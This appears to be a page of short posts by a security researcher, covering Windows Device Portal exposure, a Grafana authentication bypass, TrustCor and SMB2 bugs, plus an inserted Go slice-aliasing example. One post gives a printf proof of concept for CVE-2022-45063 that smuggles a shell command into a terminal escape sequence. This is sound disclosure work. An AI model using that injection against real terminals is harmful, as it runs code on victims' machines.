  • November 12, 2022
    HD Moore
    @hdm

    Meet my two Windows arm64 devices for @runZeroInc – on the left we have the snazzy new Windows Dev Kit 2023 ($599 USD), on the right we have a Pi 400 ($100+ USD).

    My company’s (@runZeroInc) first request for arm64 support on Windows was almost two years ago and the only reasonably priced hardware that could run Windows 10+ was the Raspberry Pi 400 (and Raspberry Pi 4 4GB+ models). Installing Windows on these Raspberry Pis required various backflips and dodgy drivers to use more than 3Gb of RAM. The result was a laggy desktop, but something that was technically functional, thanks to npcap support for arm64 from Insecure, LLC.

    Fast forward to Q4 2022 – serious hardware for arm64! The Windows Dev Kit 2023 includes 32Gb of RAM, 512Gb of NVMe, and a solid processor. The desktop is at least better than most Celerons and the memory support makes this usable for development. The downside, currently, is price, and we hope that arm64 options for Windows will improve going forward. The dev kit is much less painful to use than the jenky Windows support for the Pis, but support for Windows 11 also highlights another interesting (and security-relevant) service: the Windows Device Portal.

    The Windows Device Portal is an optional service available after enabling developer settings. The service provides a web interface for remote management, with optional authentication, and provides everything an attacker could ask for (including remote process dumps of lsass.exe).

    This service runs on TCP 50080 (HTTP) and 50443 (HTTPS), and while you are only likely to find it on development systems, any Windows 11 administrator can enable it. The bad news: with optional authentication, this service is effectively unauthenticated remote system access, with the benefit of using signed binaries. The good news is that it should be rare, and even the lame static username and password configuration (unrelated to Windows authentication), can prevent casual network abuse. We plan to add support for detection of this service in the next build of runZero all the same.

    Thanks for reading (and the warm welcome to Mastodon)!

  • November 10, 2022
    HD Moore
    @hdm

    Terminal emulation bugs are the best: https://www.openwall.com/lists/oss-security/2022/11/10/1

    printf "\e]50;i\$(touch /tmp/hack-like-its-1999)\a\e]50;?\a" > cve-2022-45063

  • November 9, 2022
    HD Moore
    @hdm

    Yesterday's Grafana authentication bypass vulnerability (CVE-2022-39328) is really neat from the perspective of auditing Go code. Concurrent requests could accidentally share the same array slice of middleware handlers. Advisory at https://grafana.com/blog/2022/11/08/security-release-new-versions-of-grafana-with-critical-and-moderate-fixes-for-cve-2022-39328-cve-2022-39307-and-cve-2022-39306/ and actual patch diff at https://github.com/grafana/grafana/pull/58458/files

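The slice-aliasing pattern behind that class of Go bug, as an added illustration (constructed for this page, not Grafana's code; the handler names and chain builders are made up): a base middleware slice with spare capacity, a buggy append that lets two chains overwrite each other, and the copying fix.

```go
package main

import "fmt"

// Handler is a stand-in for one middleware step; each records its name in trace.
// (Constructed illustration of the slice-aliasing pitfall, not Grafana's code.)
type Handler func(trace *[]string)
func named(name string) Handler {
	return func(trace *[]string) { *trace = append(*trace, name) }
}

// buildChainBuggy appends a route-specific handler to the shared base chain.
// If base has spare capacity, append writes into base's backing array instead of
// allocating, so chains built for different routes share storage and the last append wins.
func buildChainBuggy(base []Handler, final Handler) []Handler {
	return append(base, final)
}

// buildChainSafe copies base into a fresh, exactly-sized slice first, so each
// chain owns its own backing array and appends can never alias.
func buildChainSafe(base []Handler, final Handler) []Handler {
	chain := make([]Handler, 0, len(base)+1)
	chain = append(chain, base...)
	return append(chain, final)
}

// run executes a chain and returns the order of handlers that actually ran.
func run(chain []Handler) []string {
	var trace []string
	for _, h := range chain {
		h(&trace)
	}
	return trace
}

// sharesBacking reports whether two chains point at the same underlying array.
func sharesBacking(a, b []Handler) bool {
	return len(a) > 0 && len(b) > 0 && &a[0] == &b[0]
}

func main() {
	base := make([]Handler, 1, 4) // cap > len: the hazardous shape
	base[0] = named("auth")
	admin := buildChainBuggy(base, named("require-admin"))
	_ = buildChainBuggy(base, named("allow-anonymous")) // overwrites admin[1]
	fmt.Println("buggy admin chain ran:", run(admin)) // [auth allow-anonymous]
	adminSafe := buildChainSafe(base, named("require-admin"))
	_ = buildChainSafe(base, named("allow-anonymous"))
	fmt.Println("safe admin chain ran:", run(adminSafe)) // [auth require-admin]
}
```

Running the same two builders under the race detector (`go test -race`) is the quickest way to surface this shape in real code, because the overwrite is a plain write to shared memory.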
  • November 9, 2022
    HD Moore
    @hdm

    #trustcor #tls

    Some scary reporting from @joesephmenn@twitter.com via The Post: One of the powerful root certificate authorities trusted by big web browsers to vouch for websites operates from a UPS Store address and has ties to a U.S. intelligence contractor selling interception gear: https://www.washingtonpost.com/technology/2022/11/08/trustcor-internet-addresses-government-connections/ #TrustCor #TLS

  • November 5, 2022
    HD Moore
    @hdm

    some (lol) 0-day for fun; we accidentally dropped some big bugs in https://www.runzero.com/blog/smb2-sessions/ .. 2 years - but Apple is now patching it, so it's ok (and don't mind Samba or Windows)


Copyright 1998-2025 HD Moore